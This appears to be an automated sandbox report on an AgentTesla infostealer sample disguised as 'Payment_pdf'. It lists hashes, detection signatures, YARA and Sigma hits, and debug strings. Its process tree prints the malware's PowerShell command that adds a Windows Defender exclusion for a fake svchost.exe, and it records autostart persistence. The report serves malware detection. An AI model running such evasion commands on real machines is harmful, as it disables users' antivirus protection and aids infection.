Loading ...

Play interactive tourEdit tour

Analysis Report Payment_pdf.cmd

Overview

General Information

Sample Name:Payment_pdf.cmd (renamed file extension from cmd to exe)
Analysis ID:356522
MD5:aa4f187df7370b07d17cbe08abd778a0
SHA1:e2cf0a14a87a8b87c15634f062c9b54f687c5d83
SHA256:fe378f1e009b2b77c3e08de81d767a79fee3bce433810158b3be3d470baac6b7
Tags:AgentTeslacmd

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Moves itself to temp directory
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

Startup

  • System is w10x64
  • Payment_pdf.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\Payment_pdf.exe' MD5: AA4F187DF7370B07D17CBE08ABD778A0)
    • powershell.exe (PID: 4388 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6032 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6964 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • Payment_pdf.exe (PID: 6724 cmdline: C:\Users\user\Desktop\Payment_pdf.exe MD5: AA4F187DF7370B07D17CBE08ABD778A0)
    • WerFault.exe (PID: 6180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 2032 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6372 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7120 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 2944 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6968 -ip 6968 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • explorer.exe (PID: 4936 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7036 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 3504 cmdline: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' MD5: AA4F187DF7370B07D17CBE08ABD778A0)
      • powershell.exe (PID: 6768 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6476 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • explorer.exe (PID: 5736 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 1560 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 772 cmdline: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' MD5: AA4F187DF7370B07D17CBE08ABD778A0)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • CZVkY.exe (PID: 5960 cmdline: 'C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe' MD5: AA4F187DF7370B07D17CBE08ABD778A0)
  • CZVkY.exe (PID: 2232 cmdline: 'C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe' MD5: AA4F187DF7370B07D17CBE08ABD778A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.594360112.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.423869749.0000000003AAE000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.453125199.00000000044AE000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Payment_pdf.exe.3aae1e0.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0.2.Payment_pdf.exe.3ae4200.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            12.2.Payment_pdf.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.Payment_pdf.exe.3ae4200.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.Payment_pdf.exe.3aae1e0.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Suspicious Svchost ProcessShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , CommandLine: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, NewProcessName: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, OriginalFileName: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7036, ProcessCommandLine: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , ProcessId: 3504
                  Sigma detected: System File Execution Location AnomalyShow sources
                  Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , CommandLine: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, NewProcessName: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, OriginalFileName: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7036, ProcessCommandLine: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , ProcessId: 3504
                  Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                  Source: Process startedAuthor: vburov: Data: Command: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , CommandLine: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, NewProcessName: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, OriginalFileName: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7036, ProcessCommandLine: 'C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe' , ProcessId: 3504

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeReversingLabs: Detection: 21%
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeReversingLabs: Detection: 21%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: Payment_pdf.exeVirustotal: Detection: 26%Perma Link
                  Source: Payment_pdf.exeReversingLabs: Detection: 21%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeJoe Sandbox ML: detected
                  Machine Learning detection for sampleShow sources
                  Source: Payment_pdf.exeJoe Sandbox ML: detected
                  Source: 12.2.Payment_pdf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                  Compliance:

                  barindex
                  Uses 32bit PE filesShow sources
                  Source: Payment_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                  Source: Payment_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Binary contains paths to debug symbolsShow sources
                  Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Payment_pdf.exe, 00000000.00000002.408646291.0000000000AA0000.00000004.00000020.sdmp
                  Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb: source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: ore.ni.pdb" source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdba source: Payment_pdf.exe, 00000000.00000002.408646291.0000000000AA0000.00000004.00000020.sdmp
                  Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: clr.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: .ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: ntmarta.pdbC source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: ility.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: wuser32.pdbj source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: onp1jVisualBasic.pdb$V source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408487422.0000000000A73000.00000004.00000020.sdmp
                  Source: Binary string: fltLib.pdbXb source: WerFault.exe, 0000000F.00000003.432301170.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.pdbz source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdbT3cl source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: WinTypes.pdb+ source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.408646291.0000000000AA0000.00000004.00000020.sdmp
                  Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: nsi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: Payment_pdf.PDB4 source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: Accessibility.pdb}b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: shell32.pdbH source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.pdbF source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wimm32.pdbl source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.432423021.0000000004C84000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdbT source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: version.pdb0 source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: indows.Forms.pdb? source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb! source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: rawing.pdb source: WerFault.exe, 0000000F.00000003.432349999.0000000004C98000.00000004.00000001.sdmp
                  Source: Binary string: cryptsp.pdbx source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: (P&jLC:\Windows\Microsoft.VisualBasic.pdb source: Payment_pdf.exe, 00000000.00000002.407427903.00000000006F7000.00000004.00000010.sdmp
                  Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: clrjit.pdb^ source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: oleaut32.pdb< source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: edputil.pdb9 source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb$fc source: Payment_pdf.exe, 00000000.00000002.408770500.0000000000AB8000.00000004.00000020.sdmp
                  Source: Binary string: System.pdbx source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb> source: Payment_pdf.exe, 00000000.00000002.408678718.0000000000AAE000.00000004.00000020.sdmp
                  Source: Binary string: System.Core.pdb[b source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.432822711.0000000004C80000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.432364134.0000000004AB1000.00000004.00000001.sdmp
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000F.00000002.497067048.0000000004D90000.00000004.00000001.sdmp
                  Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
